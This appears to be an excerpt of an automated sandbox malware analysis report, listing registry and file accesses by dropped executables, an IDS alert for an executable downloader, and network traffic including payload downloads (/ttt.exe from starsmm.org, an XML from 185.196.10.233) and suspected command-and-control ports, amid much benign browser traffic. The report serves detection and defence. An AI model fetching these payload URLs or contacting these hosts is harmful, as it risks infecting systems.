Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49732 -> 179.43.170.230:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.196.10.233 ports 39001,0,1,3,35662,80,9

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 185.196.10.233:39001

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ttt.exe HTTP/1.1Host: starsmm.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 131.253.33.200 131.253.33.200
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 52.159.108.190 52.159.108.190
Source: Joe Sandbox View	IP Address: 13.107.213.41 13.107.213.41

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163

Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnlBHVf9QbAmjPnmJQnDwEcerxafOq8p01cAfJ5QoFk2s6gAMnMY_23BNiizXK2e-3smriJGTe2WOZO9s5X2xejbvoKpPILOKN2-0t9ZbrurACaLAMZSmuXX9slHldVQ07B5bvw6KCm_x6CONA/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_76_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.6c9316b09d3f8e566483.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.119ca1abd9fdaf26e071.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.7f8ced0e5ba45618e733.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.ece9643c5babc8e535e2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nkGyhUBOnovzuz5&MD=oygleuew HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20240423.509&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-1s-mm-wid-t%22,%22prg-1s-sm-workid%22,%22prg-1s-twid%22,%22prg-1s-workid%22,%22prg-1s-wpocfpc%22,%22prg-1sw-finvldc%22,%22prg-1sw-fli-ex2c%22,%22prg-1sw-iconmap%22,%22prg-1sw-iplsd-ntp%22,%22prg-1sw-iplsdc-ntp%22,%22prg-1sw-iplsdc1p2%22,%22prg-1sw-iplsdp1%22,%22prg-1sw-iplsdp2%22,%22prg-1sw-lksincstbl%22,%22prg-1sw-p1widinc%22,%22prg-1sw-p1widinc-2d%22,%22prg-1sw-pde0%22,%22prg-1sw-popularc%22,%22prg-1sw-rr2fn%22,%22prg-1sw-rr2fp%22,%22prg-1sw-sa-annquota14%22,%22prg-1sw-sa-distillation4-t1%22,%22prg-1sw-sa-ntf-ddp-c%22,%22prg-1sw-sacfxevery2-t1%22,%22prg-1sw-saerevrfcc%22,%22prg-1sw-sageimterav3i2c%22,%22prg-1sw-sim-adapt%22,%22prg-1sw-socc-ntp%22,%22prg-1sw-socc-p1%22,%22prg-1sw-socc-p2%22,%22prg-1sw-srdus%22,%22prg-1sw-wxmptreplace%22,%22prg-2unified-uc-t%22,%22prg-ad-ai-imgf-c%22,%22prg-ad-pdedupe-c%22,%22prg-ad-va-rf-c%22,%22prg-adspeek%22,%22prg-bttd-c%22,%22prg-c-arb-rsz%22,%22prg-cg-c-hb%22,%22prg-cg-cmga%22,%22prg-cg-cmgroupa%22,%22prg-cg-dom-cleac%22,%22prg-cg-featured-c%22,%22prg-cg-homepagec%22,%22prg-cg-ingames-ct%22,%22prg-cg-notf%22,%22prg-cg-notf2%22,%22prg-cg-ntv-ad-blnd%22,%22prg-chnl-umf-follow%22,%22prg-chpg-ldgw%22,%22prg-co-ctr%22,%22prg-cookiecont%22,%22prg-csacclink-c%22,%22prg-ctr-pnpc%22,%22prg-entpremier-pr2-c%22,%22prg-fin-cdicon%22,%22prg-fin-cnosign%22,%22prg-fin-errde%22,%22prg-fin-l2tnews%22,%22prg-fin-l2tnews1%22,%22prg-mon-qcrfs%22,%22prg-p2-prmft%22,%22prg-p2-wx2lrot%22,%22prg-pr2-entprem-c%22,%22prg-pr2-flashrev%22,%22prg-pr2-noreqcap%22,%22prg-pr2-pagecontext%22,%22prg-pr2-shoreline%22,%22prg-pr2-sidebar%22,%22prg-pr2-sidebar-5-t%22,%22prg-pr2-svganimac%22,%22prg-rfrcsmc%22,%22prg-rpt2%22,%22prg-sh-bd-disgb-c%22,%22prg-sh-bd-newbanner%22,%22prg-sh-bd-newchckot%22,%22prg-sh-bd-nwchk%22,%22prg-sh-bd-pagoff%22,%22prg-sh-bd-ts%22,%22prg-sh-bd-video%22,%22prg-sh-dealsdaypdp%22,%22prg-sh-lowinv%22,%22prg-sh-lowinv1%22,%22prg-sh-recopdp%22,%22prg-sh-rmitmlnk%22,%22prg-sp-liveapi%22,%22prg-sp-nba24%22,%22prg-sp-nhl24%22,%22prg-sriver-wpo%22,%22prg-strrtng-g1%22,%22prg-ugc-likechange%22,%22prg-unified-p2%22,%22prg-upsaip-r-t%22,%22prg-upsaip-w1-t%22,%22prg-vidbuf1%22,%22prg-whp-minil1%22,%22prg-wx-ncar%22]} HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_topics-shared-state_dist_TopicData_connector_js-libs_topics-shared-state_dist_TopicData_-62f9da.338ce1fb43cf41e7abe5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/topicData.2b96ade0ff66928c1ebb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-data-connector.02a4c4f575b24365379f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-placement-manager.5ea7db000698f8928d23.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&RedC=c.msn.com&MXFR=09C025F5A71D6FE2180F319FA60A6E8D HTTP/1.1Host: c.bing.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-MS-GEC: AA3F3A36179501D1BB719097791ED2061AD744BADEDF443DFF44FDF5C2CE7FF5Sec-MS-GEC-Version: 1-117.0.2045.47Referer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=132ee5f1be77e922e6653ec1713906140; PID=123ee5f1be931922e66559f1713906140; XID=132ee5f1be77e922e6653ec1713906140
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=09C025F5A71D6FE2180F319FA60A6E8D&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8684241135348538038&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=1124273d17bd4f5db59c2e1a7b4e70fe HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/serviceBasedChannelDataProvider.9c4c33b7b565b7ebefde.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
